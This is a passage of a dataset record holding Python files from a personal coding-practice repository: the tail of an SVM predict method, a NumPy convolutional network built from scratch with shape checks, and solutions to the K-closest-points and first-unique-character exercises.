np.mean(y - np.dot(X, np.dot(X.T, self.α * self.y)))\n\n def predict(self, X_test):\n \"\"\"Return a numpy array of prediction labels\"\"\"\n if isinstance(X_test, pd.DataFrame):\n X_test = X_test.values\n predict = np.dot(rbf_kernel(X_test, X_test), self.α * self.y) + self.b\n predict = [1 if x >= 0 else 0 for x in predict]\n return np.array(predict)\n" }, { "alpha_fraction": 0.5079226493835449, "alphanum_fraction": 0.5447012782096863, "avg_line_length": 33.5728645324707, "blob_id": "6cf1fce36b078a26cc2613767a105699c26110ca", "content_id": "83b8667f45e4fed18266e4acca4b753152eeccf9", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6879, "license_type": "permissive", "max_line_length": 91, "num_lines": 199, "path": "/Model Building From Scratch/CNN.py", "repo_name": "Cedric-Liu/Coding-Journal", "src_encoding": "UTF-8", "text": "import numpy as np\nfrom functools import reduce\n\n\nclass Conv2D(object):\n def __init__(self, shape, output_channels, ksize=3, stride=1, method='VALID'):\n self.input_shape = shape\n self.output_channels = output_channels\n self.input_channels = shape[-1]\n self.batchsize = shape[0]\n self.stride = stride\n self.ksize = ksize\n self.method = method\n self.weights = np.random.standard_normal(\n (ksize, ksize, self.input_channels, self.output_channels))\n\n if method == 'VALID':\n self.eta = np.zeros((shape[0], (shape[1] - ksize + 1) //\n self.stride, (shape[1] - ksize + 1) // self.stride,\n self.output_channels))\n\n if method == 'SAME':\n self.eta = np.zeros((shape[0], shape[1]//self.stride,\n shape[2]//self.stride,self.output_channels))\n\n self.output_shape = self.eta.shape\n\n\n def forward(self, x):\n col_weights = self.weights.reshape([-1, self.output_channels])\n if self.method == 'SAME':\n x = np.pad(x, (\n (0, 0), (self.ksize // 2, self.ksize // 2),\n (self.ksize // 2, self.ksize // 2), (0, 0)),\n 'constant', constant_values=0)\n\n self.col_image = []\n conv_out = 
np.zeros(self.eta.shape)\n for i in range(self.batchsize):\n img_i = x[i][np.newaxis, :]\n self.col_image_i = im2col(img_i, self.ksize, self.stride)\n conv_out[i] = np.reshape(np.dot(self.col_image_i,\n col_weights),\n self.eta[0].shape)\n self.col_image.append(self.col_image_i)\n self.col_image = np.array(self.col_image)\n return conv_out\n\n\n\ndef im2col(image, ksize, stride):\n # image is a 4d tensor([batchsize, width ,height, channel])\n image_col = []\n for i in range(0, image.shape[1] - ksize + 1, stride):\n for j in range(0, image.shape[2] - ksize + 1, stride):\n col = image[:, i:i + ksize, j:j + ksize, :].reshape([-1])\n image_col.append(col)\n image_col = np.array(image_col)\n\n return image_col\n\n\nclass Relu(object):\n def __init__(self, shape):\n self.eta = np.zeros(shape)\n self.x = np.zeros(shape)\n self.output_shape = shape\n\n def forward(self, x):\n self.x = x\n return np.maximum(x, 0)\n\n\nclass MaxPooling(object):\n def __init__(self, shape, ksize=2, stride=2):\n self.input_shape = shape\n self.ksize = ksize\n self.stride = stride\n self.output_channels = shape[-1]\n self.index = np.zeros(shape)\n self.output_shape = [shape[0], shape[1] // self.stride,\n shape[2] // self.stride, self.output_channels]\n\n\n def forward(self, x):\n out = np.zeros([x.shape[0], x.shape[1] // self.stride, x.shape[2] //\n self.stride, self.output_channels])\n\n for b in range(x.shape[0]):\n for c in range(self.output_channels):\n for i in range(0, x.shape[1], self.stride):\n for j in range(0, x.shape[2], self.stride):\n out[b, i // self.stride, j // self.stride, c] = np.max(\n x[b, i:(i + self.ksize), j:(j + self.ksize), c])\n index = np.argmax(x[b, i:i + self.ksize, j:j + self.ksize, c])\n self.index[b, i+index//self.stride, j + index % self.stride, c] = 1\n return out\n\n\nclass DenselyConnect(object):\n def __init__(self, shape, output_num=2):\n self.input_shape = shape\n self.batchsize = shape[0]\n\n input_len = reduce(lambda x, y: x * y, shape[1:])\n\n 
self.weights = np.random.standard_normal((input_len, output_num))\n\n self.output_shape = [self.batchsize, output_num]\n\n\n def forward(self, x):\n self.x = x.reshape([self.batchsize, -1])\n output = np.dot(self.x, self.weights)\n return output\n\n\nclass Softmax(object):\n def __init__(self, shape):\n self.softmax = np.zeros(shape)\n self.eta = np.zeros(shape)\n self.batchsize = shape[0]\n\n\n def predict(self, prediction):\n exp_prediction = np.zeros(prediction.shape)\n self.softmax = np.zeros(prediction.shape)\n for i in range(self.batchsize):\n prediction[i, :] -= np.max(prediction[i, :])\n exp_prediction[i] = np.exp(prediction[i])\n self.softmax[i] = exp_prediction[i]/np.sum(exp_prediction[i])\n return self.softmax\n\n\nif __name__ == \"__main__\":\n img = np.ones((1, 28, 28, 1))\n conv1 = Conv2D(img.shape, 3, 3, 1)\n layer1 = conv1.forward(img)\n assert layer1.shape == (1, 26, 26, 3)\n print('The shape of conv1 layer is:', layer1.shape)\n\n relu1 = Relu(layer1.shape)\n layer2 = relu1.forward(layer1)\n assert layer2.shape == (1, 26, 26, 3)\n print('The shape of relu1 layer is:', layer2.shape)\n\n maxpooling1 = MaxPooling(layer2.shape, 2, 2)\n layer3 = maxpooling1.forward(layer2)\n assert layer3.shape == (1, 13, 13, 3)\n print('The shape of maxpooling1 layer is:', layer3.shape)\n\n conv2 = Conv2D(layer3.shape, 5, 4, 1)\n layer4 = conv2.forward(layer3)\n assert layer4.shape == (1, 10, 10, 5)\n print('The shape of conv2 layer is:', layer4.shape)\n\n relu2 = Relu(layer4.shape)\n layer5 = relu1.forward(layer4)\n assert layer5.shape == (1, 10, 10, 5)\n print('The shape of relu2 layer is:', layer5.shape)\n\n maxpooling2 = MaxPooling(layer5.shape, 2, 2)\n layer6 = maxpooling2.forward(layer5)\n assert layer6.shape == (1, 5, 5, 5)\n print('The shape of maxpooling2 layer is:', layer6.shape)\n\n dense1 = DenselyConnect(layer6.shape, 125)\n layer7 = dense1.forward(layer6)\n assert layer7.shape == (1, 125)\n print('The shape of flaten layer is:', layer7.shape)\n\n dense2 = 
DenselyConnect(layer7.shape, 10)\n layer8 = dense2.forward(layer7)\n assert layer8.shape == (1, 10)\n print('The shape of output layer is:', layer8.shape)\n\n softmax = Softmax(layer8.shape)\n layer9 = softmax.predict(layer8)\n assert layer9.shape == (1, 10)\n print('The shape of softmax layer is:', layer9.shape)\n\n img = np.array([[-11, 4, 1, -1, 12, 9],\n [1, -4, 3, 0, 1, 10],\n [9, 2, -5, -7, -10, -8],\n [8, -2, 1, -11, -5, 7],\n [-5, 0, -5, -1, -5, 3],\n [-8, 2, 6, 5, -3, -4]])\n\n img = np.pad(img, (1,1), 'reflect')\n print(img)\n img = img.reshape(1, 8, 8, 1)\n conv = Conv2D(img.shape, 1, 3, 1)\n conv.weights = np.array([[2,8,11],\n [-7,-6,-6],\n [1,-9,-11]])\n conv.weights = conv.weights.reshape(3,3,1,1)\n print(conv.weights.shape)\n output = conv.forward(img)\n print(output)" }, { "alpha_fraction": 0.5542288422584534, "alphanum_fraction": 0.5830845832824707, "avg_line_length": 37.67307662963867, "blob_id": "72ee92a54ba04e252561e9fc035e5031c8905cfe", "content_id": "896c1e3450a0458701b038537310901150ee35f7", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2010, "license_type": "permissive", "max_line_length": 71, "num_lines": 52, "path": "/Data Structure and Algorithms/K Closest Points to Origin.py", "repo_name": "Cedric-Liu/Coding-Journal", "src_encoding": "UTF-8", "text": "# We have a list of points on the plane.\n# Find the K closest points to the origin (0, 0).\ndef kClosest(points, K):\n def cal_square_dis(point):\n return point[0] ** 2 + point[1] ** 2\n\n square_dis = [cal_square_dis(point) for point in points]\n max_heap = [i for i in range(K)]\n curr_max = max([square_dis[i] for i in max_heap])\n curr_max_idx = square_dis.index(curr_max)\n for i in range(K, len(points)):\n if square_dis[i] < curr_max:\n max_heap = [i for i in max_heap if i != curr_max_idx]\n max_heap.append(i)\n curr_max = max([square_dis[j] for j in max_heap])\n curr_max_idx = square_dis.index(curr_max)\n return 
[points[i] for i in max_heap]\n\n\n# faster version:\ndef kClosest(points, K):\n def cal_square_dis(point):\n return point[0] ** 2 + point[1] ** 2\n\n square_dis = [cal_square_dis(point) for point in points]\n max_heap = [i for i in range(K)]\n curr_max = max([square_dis[i] for i in max_heap])\n curr_max_idx = square_dis.index(curr_max)\n curr_max_idx_heap = max_heap.index(curr_max_idx)\n for i in range(K, len(points)):\n if square_dis[i] < curr_max:\n max_heap[curr_max_idx_heap] = i\n curr_max = max([square_dis[i] for i in max_heap])\n curr_max_idx = square_dis.index(curr_max)\n curr_max_idx_heap = max_heap.index(curr_max_idx)\n return [points[i] for i in max_heap]\n\n\n# sort version(much faster):\ndef kClosest(points, K):\n def cal_square_dis(point):\n return point[0] ** 2 + point[1] ** 2\n\n square_dis = [cal_square_dis(point) for point in points]\n hash_dic = dict((key, value) for key, value in\n zip(list(range(len(points))), square_dis))\n sorted_dic = sorted(hash_dic.items(), key=lambda x: x[1])\n index_k = [sorted_dic[k][0] for k in range(K)]\n return [points[k] for k in index_k]\n\nkClosest([[-95,76],[17,7],[-55,-58],[53,20],[-69,-8],[-57,87],[-2,-42],\n [-10,-87],[-36,-57],[97,-39],[97,49]],5)" }, { "alpha_fraction": 0.5135593414306641, "alphanum_fraction": 0.5237287878990173, "avg_line_length": 33.764705657958984, "blob_id": "01e4aa07862d950fc78becef795a3be3971965d1", "content_id": "09ec0dc6ebccdd661d2770103194b3f2d5c94745", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 590, "license_type": "permissive", "max_line_length": 74, "num_lines": 17, "path": "/Data Structure and Algorithms/First Unique Character in a String.py", "repo_name": "Cedric-Liu/Coding-Journal", "src_encoding": "UTF-8", "text": "#Given a string, find the first non-repeating character in\n# it and return it's index. 
If it doesn't exist, return -1.\n\ndef firstUniqChar(s: str) -> int:\n if not s:\n return -1\n count = {}\n for char in s:\n count[char] = count.get(char, 0) + 1\n distinct = list(filter(lambda x: count[x] == 1, [key for key, value in\n zip(count.keys(),\n count.values())]))\n if not distinct:\n return -1\n return min([s.find(item) for item in distinct])\n\nfirstUniqChar(\"leetcode\")" } ]
19
AvatarGanymede/ChinesePaintingStyle
https://github.com/AvatarGanymede/ChinesePaintingStyle
ca9c0e0f3f2f2370e02e2c1c91fcbcac230692fa
c9fbd91efd5f297e902f5658c005202156b4618e
e6f90dd6c21839325d03395ee5a364370d23e3c0
refs/heads/master
2023-06-02T07:10:46.099475
2021-06-16T16:22:56
2021-06-16T16:22:56
374,927,036
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5884491205215454, "alphanum_fraction": 0.602990984916687, "avg_line_length": 42.224998474121094, "blob_id": "e045101d142ba4f6fbc4bc950d21561018e0ab90", "content_id": "955fce257718aaf44354c4aaa3b7cddbff26097e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12104, "license_type": "permissive", "max_line_length": 121, "num_lines": 280, "path": "/models/models.py", "repo_name": "AvatarGanymede/ChinesePaintingStyle", "src_encoding": "UTF-8", "text": "import torch\nimport torch.nn as nn\nfrom torch.nn import init\nimport functools\nfrom torch.optim import lr_scheduler\nfrom utils.params import opt\n\n\ndef init_net(net, init_gain=0.02, gpu_ids=[]):\n # init net\n if len(gpu_ids) > 0:\n assert (torch.cuda.is_available())\n net.to(gpu_ids[0])\n net = torch.nn.DataParallel(net, gpu_ids) # multi-GPUs\n\n # using kaiming init to init weights\n def init_func(m): # define the initialization function\n classname = m.__class__.__name__\n if hasattr(m, 'weight') and (classname.find('Conv') != -1 or classname.find('Linear') != -1):\n init.normal_(m.weight.data, 0.0, init_gain)\n elif classname.find(\n 'BatchNorm2d') != -1: # BatchNorm Layer's weight is not a matrix; only normal distribution applies.\n init.normal_(m.weight.data, 1.0, init_gain)\n init.constant_(m.bias.data, 0.0)\n\n net.apply(init_func)\n return net\n\n\nclass ResnetBlock(nn.Module):\n \"\"\"Define a Resnet block\"\"\"\n\n def __init__(self, dim, padding_type, norm_layer, use_dropout, use_bias):\n \"\"\"Initialize the Resnet block\n\n A resnet block is a conv block with skip connections\n We construct a conv block with build_conv_block function,\n and implement skip connections in <forward> function.\n Original Resnet paper: https://arxiv.org/pdf/1512.03385.pdf\n \"\"\"\n super(ResnetBlock, self).__init__()\n self.conv_block = self.build_conv_block(dim, padding_type, norm_layer, use_dropout, use_bias)\n\n def 
build_conv_block(self, dim, padding_type, norm_layer, use_dropout, use_bias):\n \"\"\"Construct a convolutional block.\n\n Parameters:\n dim (int) -- the number of channels in the conv layer.\n padding_type (str) -- the name of padding layer: reflect | replicate | zero\n norm_layer -- normalization layer\n use_dropout (bool) -- if use dropout layers.\n use_bias (bool) -- if the conv layer uses bias or not\n\n Returns a conv block (with a conv layer, a normalization layer, and a non-linearity layer (ReLU))\n \"\"\"\n conv_block = []\n p = 0\n if padding_type == 'reflect':\n conv_block += [nn.ReflectionPad2d(1)]\n elif padding_type == 'replicate':\n conv_block += [nn.ReplicationPad2d(1)]\n elif padding_type == 'zero':\n p = 1\n else:\n raise NotImplementedError('padding [%s] is not implemented' % padding_type)\n\n conv_block += [nn.Conv2d(dim, dim, kernel_size=3, padding=p, bias=use_bias), norm_layer(dim), nn.ReLU(True)]\n if use_dropout:\n conv_block += [nn.Dropout(0.5)]\n\n p = 0\n if padding_type == 'reflect':\n conv_block += [nn.ReflectionPad2d(1)]\n elif padding_type == 'replicate':\n conv_block += [nn.ReplicationPad2d(1)]\n elif padding_type == 'zero':\n p = 1\n else:\n raise NotImplementedError('padding [%s] is not implemented' % padding_type)\n conv_block += [nn.Conv2d(dim, dim, kernel_size=3, padding=p, bias=use_bias), norm_layer(dim)]\n\n return nn.Sequential(*conv_block)\n\n def forward(self, x):\n \"\"\"Forward function (with skip connections)\"\"\"\n out = x + self.conv_block(x) # add skip connections\n return out\n\n\nclass ResnetGenerator(nn.Module):\n \"\"\"\n Adapt Torch code and idea from Justin Johnson's neural style transfer project(https://github.com/jcjohnson/fast-neural-style)\n \"\"\"\n\n def __init__(self, input_nc, output_nc, ngf=64, norm_layer=nn.BatchNorm2d, use_dropout=False, n_blocks=6,\n padding_type='reflect'):\n \"\"\"Construct a Resnet-based generator\n\n Parameters:\n input_nc (int) -- the number of channels in input images\n 
output_nc (int) -- the number of channels in output images\n ngf (int) -- the number of filters in the last conv layer\n norm_layer -- normalization layer\n use_dropout (bool) -- if use dropout layers\n n_blocks (int) -- the number of ResNet blocks\n padding_type (str) -- the name of padding layer in conv layers: reflect | replicate | zero\n \"\"\"\n assert (n_blocks >= 0)\n super(ResnetGenerator, self).__init__()\n if type(norm_layer) == functools.partial:\n use_bias = norm_layer.func == nn.InstanceNorm2d\n else:\n use_bias = norm_layer == nn.InstanceNorm2d\n\n model = [nn.ReflectionPad2d(3),\n nn.Conv2d(input_nc, ngf, kernel_size=7, padding=0, bias=use_bias),\n norm_layer(ngf),\n nn.ReLU(True)]\n\n n_downsampling = 2\n for i in range(n_downsampling): # add downsampling layers\n mult = 2 ** i\n model += [nn.Conv2d(ngf * mult, ngf * mult * 2, kernel_size=3, stride=2, padding=1, bias=use_bias),\n norm_layer(ngf * mult * 2),\n nn.ReLU(True)]\n\n mult = 2 ** n_downsampling\n for i in range(n_blocks): # add ResNet blocks\n\n model += [ResnetBlock(ngf * mult, padding_type=padding_type, norm_layer=norm_layer, use_dropout=use_dropout,\n use_bias=use_bias)]\n\n for i in range(n_downsampling): # add upsampling layers\n mult = 2 ** (n_downsampling - i)\n model += [nn.ConvTranspose2d(ngf * mult, int(ngf * mult / 2),\n kernel_size=3, stride=2,\n padding=1, output_padding=1,\n bias=use_bias),\n norm_layer(int(ngf * mult / 2)),\n nn.ReLU(True)]\n model += [nn.ReflectionPad2d(3)]\n model += [nn.Conv2d(ngf, output_nc, kernel_size=7, padding=0)]\n model += [nn.Tanh()]\n\n self.model = nn.Sequential(*model)\n\n def forward(self, input):\n \"\"\"Standard forward\"\"\"\n return self.model(input)\n\n\ndef define_G(input_nc, output_nc, ngf, use_dropout=False, init_gain=0.02, gpu_ids=[]):\n \"\"\"Create a generator\n\n Parameters:\n input_nc (int) -- the number of channels in input images\n output_nc (int) -- the number of channels in output images\n ngf (int) -- the number of filters in 
the last conv layer\n netG (str) -- the architecture's name: resnet_9blocks | resnet_6blocks | unet_256 | unet_128\n norm (str) -- the name of normalization layers used in the network: batch | instance | none\n use_dropout (bool) -- if use dropout layers.\n init_type (str) -- the name of our initialization method.\n init_gain (float) -- scaling factor for normal, xavier and orthogonal.\n gpu_ids (int list) -- which GPUs the network runs on: e.g., 0,1,2\n\n Returns a generator\n\n Our current implementation provides two types of generators:\n U-Net: [unet_128] (for 128x128 input images) and [unet_256] (for 256x256 input images)\n The original U-Net paper: https://arxiv.org/abs/1505.04597\n\n Resnet-based generator: [resnet_6blocks] (with 6 Resnet blocks) and [resnet_9blocks] (with 9 Resnet blocks)\n Resnet-based generator consists of several Resnet blocks between a few downsampling/upsampling operations.\n We adapt Torch code from Justin Johnson's neural style transfer project (https://github.com/jcjohnson/fast-neural-style).\n\n\n The generator has been initialized by <init_net>. 
It uses RELU for non-linearity.\n \"\"\"\n # using batch norm\n norm_layer = functools.partial(nn.BatchNorm2d, affine=True, track_running_stats=True)\n # using resnet-9blocks\n net = ResnetGenerator(input_nc, output_nc, ngf, norm_layer=norm_layer, use_dropout=use_dropout, n_blocks=9)\n # init net\n return init_net(net, init_gain, gpu_ids)\n\n\nclass NLayerDiscriminator(nn.Module):\n \"\"\"Defines a PatchGAN discriminator\"\"\"\n\n def __init__(self, input_nc, ndf=64, n_layers=3, norm_layer=nn.BatchNorm2d):\n \"\"\"Construct a PatchGAN discriminator\n\n Parameters:\n input_nc (int) -- the number of channels in input images\n ndf (int) -- the number of filters in the last conv layer\n n_layers (int) -- the number of conv layers in the discriminator\n norm_layer -- normalization layer\n \"\"\"\n super(NLayerDiscriminator, self).__init__()\n if type(norm_layer) == functools.partial: # no need to use bias as BatchNorm2d has affine parameters\n use_bias = norm_layer.func == nn.InstanceNorm2d\n else:\n use_bias = norm_layer == nn.InstanceNorm2d\n\n kw = 4\n padw = 1\n sequence = [nn.Conv2d(input_nc, ndf, kernel_size=kw, stride=2, padding=padw), nn.LeakyReLU(0.2, True)]\n nf_mult = 1\n nf_mult_prev = 1\n for n in range(1, n_layers): # gradually increase the number of filters\n nf_mult_prev = nf_mult\n nf_mult = min(2 ** n, 8)\n sequence += [\n nn.Conv2d(ndf * nf_mult_prev, ndf * nf_mult, kernel_size=kw, stride=2, padding=padw, bias=use_bias),\n norm_layer(ndf * nf_mult),\n nn.LeakyReLU(0.2, True)\n ]\n\n nf_mult_prev = nf_mult\n nf_mult = min(2 ** n_layers, 8)\n sequence += [\n nn.Conv2d(ndf * nf_mult_prev, ndf * nf_mult, kernel_size=kw, stride=1, padding=padw, bias=use_bias),\n norm_layer(ndf * nf_mult),\n nn.LeakyReLU(0.2, True)\n ]\n\n sequence += [\n nn.Conv2d(ndf * nf_mult, 1, kernel_size=kw, stride=1, padding=padw)] # output 1 channel prediction map\n self.model = nn.Sequential(*sequence)\n\n def forward(self, input):\n \"\"\"Standard forward.\"\"\"\n return 
self.model(input)\n\n\ndef define_D(input_nc, ndf, n_layers_D=3, init_gain=0.02, gpu_ids=[]):\n \"\"\"Create a discriminator\n\n Parameters:\n input_nc (int) -- the number of channels in input images\n ndf (int) -- the number of filters in the first conv layer\n netD (str) -- the architecture's name: basic | n_layers | pixel\n n_layers_D (int) -- the number of conv layers in the discriminator; effective when netD=='n_layers'\n norm (str) -- the type of normalization layers used in the network.\n init_type (str) -- the name of the initialization method.\n init_gain (float) -- scaling factor for normal, xavier and orthogonal.\n gpu_ids (int list) -- which GPUs the network runs on: e.g., 0,1,2\n\n Returns a discriminator\n\n Our current implementation provides three types of discriminators:\n [basic]: 'PatchGAN' classifier described in the original pix2pix paper.\n It can classify whether 70×70 overlapping patches are real or fake.\n Such a patch-level discriminator architecture has fewer parameters\n than a full-image discriminator and can work on arbitrarily-sized images\n in a fully convolutional fashion.\n\n [n_layers]: With this mode, you can specify the number of conv layers in the discriminator\n with the parameter <n_layers_D> (default=3 as used in [basic] (PatchGAN).)\n\n [pixel]: 1x1 PixelGAN discriminator can classify whether a pixel is real or not.\n It encourages greater color diversity but has no effect on spatial statistics.\n\n The discriminator has been initialized by <init_net>. 
It uses Leakly RELU for non-linearity.\n \"\"\"\n # using batch norm\n norm_layer = functools.partial(nn.BatchNorm2d, affine=True, track_running_stats=True)\n\n net = NLayerDiscriminator(input_nc, ndf, n_layers_D, norm_layer=norm_layer)\n # init net\n return init_net(net, init_gain, gpu_ids)\n\n\ndef get_scheduler(optimizer):\n def lambda_rule(epoch):\n lr_l = 1.0 - max(0, epoch + opt['epoch_count'] - opt['n_epochs']) / float(opt['n_epochs_decay'] + 1)\n return lr_l\n\n scheduler = lr_scheduler.LambdaLR(optimizer, lr_lambda=lambda_rule)\n return scheduler\n" }, { "alpha_fraction": 0.6461761593818665, "alphanum_fraction": 0.6500483751296997, "avg_line_length": 53.3684196472168, "blob_id": "a4bf6099720613adf13aa40616f4e0724d11dade", "content_id": "32a4287f5cfcf93631c52c5091b9eda62eac3a97", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2066, "license_type": "permissive", "max_line_length": 135, "num_lines": 38, "path": "/test.py", "repo_name": "AvatarGanymede/ChinesePaintingStyle", "src_encoding": "UTF-8", "text": "import os\nfrom utils import create_dataset\nfrom models import create_model\nfrom utils.visualizer import save_images\nfrom utils import html\nfrom utils.params import opt\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\n\nif __name__ == '__main__':\n dataset = create_dataset('test') # create a dataset given opt.dataset_mode and other options\n dataset_size = len(dataset)\n print('The number of training images = %d' % dataset_size)\n model = create_model(False) # create a model given opt.model and other options\n model.setup() # regular setup: load and print networks; create schedulers\n # create a website\n web_dir = os.path.join(opt['results_dir'], opt['name'], '{}_{}'.format(opt['phase'], opt['epoch'])) # define the website directory\n if opt['load_iter'] > 0: # load_iter is 0 by default\n web_dir = '{:s}_iter{:d}'.format(web_dir, opt.load_iter)\n print('creating web directory', 
web_dir)\n webpage = html.HTML(web_dir, 'Experiment = %s, Phase = %s, Epoch = %s' % (opt['name'], opt['phase'], opt['epoch']))\n # test with eval mode. This only affects layers like batchnorm and dropout.\n # For [pix2pix]: we use batchnorm and dropout in the original pix2pix. You can experiment it with and without eval() mode.\n # For [CycleGAN]: It should not affect CycleGAN as CycleGAN uses instancenorm without dropout.\n # if opt.eval:\n # model.eval()\n for i, data in enumerate(dataset):\n if i >= opt['num_test']: # only apply our model to opt.num_test images.\n break\n model.set_input(data) # unpack data from data loader\n model.test() # run inference\n visuals = model.get_current_visuals() # get image results\n img_path = model.get_image_paths() # get image paths\n if i % 5 == 0: # save images to an HTML file\n print('processing (%04d)-th image... %s' % (i, img_path))\n save_images(webpage, visuals, img_path, aspect_ratio=opt['aspect_ratio'], width=opt['display_winsize'])\n webpage.save() # save the HTML\n" }, { "alpha_fraction": 0.5713415741920471, "alphanum_fraction": 0.5792599320411682, "avg_line_length": 34.690216064453125, "blob_id": "1d162e3857c76a140d600cea4a1832900bd92d8c", "content_id": "701d70e5aeb996783c57d7be8c52a822e24981c6", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6767, "license_type": "permissive", "max_line_length": 115, "num_lines": 184, "path": "/main.py", "repo_name": "AvatarGanymede/ChinesePaintingStyle", "src_encoding": "UTF-8", "text": "import os\nimport sys\nimport threading\nimport time\n\nimport cv2 as cv\nfrom PyQt5.QtGui import QImage, QPixmap\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtWidgets import *\nfrom gui.chinesepaintings import Ui_MainWindow\nfrom models import create_model\nfrom edge.hed import extract_edge\nimport warnings\nfrom utils.params import opt\nfrom utils import create_dataset, html\nfrom utils.visualizer import 
save_images\n\nwarnings.filterwarnings(\"ignore\")\nStyleSheet = \"\"\"\n/*标题栏*/\nTitleBar {\n background-color: red;\n}\n/*最小化最大化关闭按钮通用默认背景*/\n#buttonMinimum,#buttonClose {\n border: none;\n background-color: red;\n}\n/*悬停*/\n#buttonMinimum:hover{\n background-color: red;\n color: white;\n}\n#buttonClose:hover {\n color: white;\n}\n/*鼠标按下不放*/\n#buttonMinimum:pressed{\n background-color: Firebrick;\n}\n#buttonClose:pressed {\n color: white;\n background-color: Firebrick;\n}\n\"\"\"\n\n\ndef remove(path):\n filelist = os.listdir(path) # 打开对应的文件夹\n\n for item in filelist:\n os.remove(path+'/'+item)\n\n\ndef getImage(img, self):\n img = cv.cvtColor(img, cv.COLOR_RGB2BGR)\n width = img.shape[1]\n height = img.shape[0]\n image = QImage(img, width, height, QImage.Format_RGB888)\n scale_factor = 0\n if width > height:\n scale_factor = self.org_image.width() / float(width)\n else:\n scale_factor = self.org_image.height() / float(height)\n image = image.scaled(width * scale_factor, height * scale_factor, Qt.IgnoreAspectRatio,\n Qt.SmoothTransformation)\n return image\n\n\nclass MyMainForm(QMainWindow, Ui_MainWindow):\n def __init__(self, parent=None):\n super(MyMainForm, self).__init__(parent)\n self.setupUi(self)\n self.model = create_model(False)\n self.isvideo = False\n self.is_pause = False\n\n def Open(self):\n sc_name, filetype = QFileDialog.getOpenFileName(caption=\"选取文件\", directory=os.getcwd(),\n filter=\"All Files (*)\")\n if sc_name.split(\".\")[-1] != 'jpg' and sc_name.split(\".\")[-1] != 'png' and sc_name.split(\".\")[-1] != 'mp4':\n QMessageBox.critical(self, 'File Type Not Right', 'The type of file selected is not supported!',\n buttons=QMessageBox.Cancel)\n elif sc_name.split(\".\")[-1] == 'mp4':\n self.isvideo = True\n i = 0\n remove('./data/testA')\n capture = cv.VideoCapture(sc_name)\n self.frame_count = capture.get(cv.CAP_PROP_FRAME_COUNT)\n self.frameRate = capture.get(cv.CAP_PROP_FPS)\n if capture.isOpened():\n while True:\n ret, img = capture.read()\n 
self.progressBar.setValue(i / self.frame_count * 100)\n if not ret:\n break\n last_img = img\n cv.imwrite('./data/testA/'+str(i)+'.jpg', img)\n i = i + 1\n image = getImage(last_img, self)\n self.org_image.setPixmap(QPixmap.fromImage(image))\n else:\n img = cv.imread(sc_name)\n\n remove('./data/testA')\n cv.imwrite('./data/testA/1.jpg', img)\n\n image = getImage(img, self)\n self.org_image.setPixmap(QPixmap.fromImage(image))\n\n def Transfer(self):\n dataset = create_dataset('test') # create a dataset given opt.dataset_mode and other options\n dataset_size = len(dataset)\n self.model.setup()\n web_dir = os.path.join(opt['results_dir'], opt['name'],\n '{}_{}'.format(opt['phase'], opt['epoch'])) # define the website directory\n webpage = html.HTML(web_dir,\n 'Experiment = %s, Phase = %s, Epoch = %s' % (opt['name'], opt['phase'], opt['epoch']))\n for i, data in enumerate(dataset):\n self.progressBar.setValue(i/dataset_size*100)\n if i >= opt['num_test']: # only apply our model to opt.num_test images.\n break\n self.model.set_input(data) # unpack data from data loader\n self.model.test() # run inference\n visuals = self.model.get_current_visuals() # get image results\n img_path = self.model.get_image_paths() # get image paths\n if i % 5 == 0: # save images to an HTML file\n print('processing (%04d)-th image... 
%s' % (i, img_path))\n save_images(webpage, visuals, img_path, aspect_ratio=opt['aspect_ratio'], width=opt['display_winsize'])\n webpage.save() # save the HTML\n if not self.isvideo:\n self.progressBar.setValue(100)\n rst = cv.imread('./results/Chinese Painting Style/test_latest/images/1_fake_B.png')\n image = getImage(rst, self)\n self.after_image.setPixmap(QPixmap.fromImage(image))\n org = cv.imread('./results/Chinese Painting Style/test_latest/images/1_real_A.png')\n image = getImage(org, self)\n self.org_image.setPixmap(QPixmap.fromImage(image))\n else:\n self.progressBar.setValue(0)\n th = threading.Thread(target=self.Display)\n th.setDaemon(True)\n th.start()\n\n # display the video on the QLabel\n def Display(self):\n i = 0\n while i < self.frame_count:\n # calculate the processing time\n time_start = time.time()\n if self.is_pause:\n continue\n frame = cv.imread('./results/Chinese Painting Style/test_latest/images/'+str(i)+'_fake_B.png')\n org = cv.imread('./results/Chinese Painting Style/test_latest/images/'+str(i)+'_real_A.png')\n image = getImage(frame, self)\n self.after_image.setPixmap(QPixmap.fromImage(image))\n image = getImage(org, self)\n self.org_image.setPixmap(QPixmap.fromImage(image))\n time_end = time.time()\n time_wait = int(1000 / self.frameRate - 1000 * (time_end - time_start))\n if time_wait <= 0:\n time_wait = 1\n cv.waitKey(time_wait)\n self.progressBar.setValue(i/self.frame_count*100)\n i = i + 1\n\n def Pause(self):\n self.is_pause = not self.is_pause\n\n def Play(self):\n self.is_pause = False\n\n\nif __name__ == \"__main__\":\n # 固定的,PyQt5程序都需要QApplication对象。sys.argv是命令行参数列表,确保程序可以双击运行\n app = QApplication(sys.argv)\n app.setStyleSheet(StyleSheet)\n\n # 初始化\n myWin = MyMainForm()\n # 将窗口控件显示在屏幕上\n myWin.show()\n # 程序运行,sys.exit方法确保程序完整退出。\n sys.exit(app.exec_())\n" }, { "alpha_fraction": 0.6144494414329529, "alphanum_fraction": 0.6179229021072388, "avg_line_length": 34.10975646972656, "blob_id": 
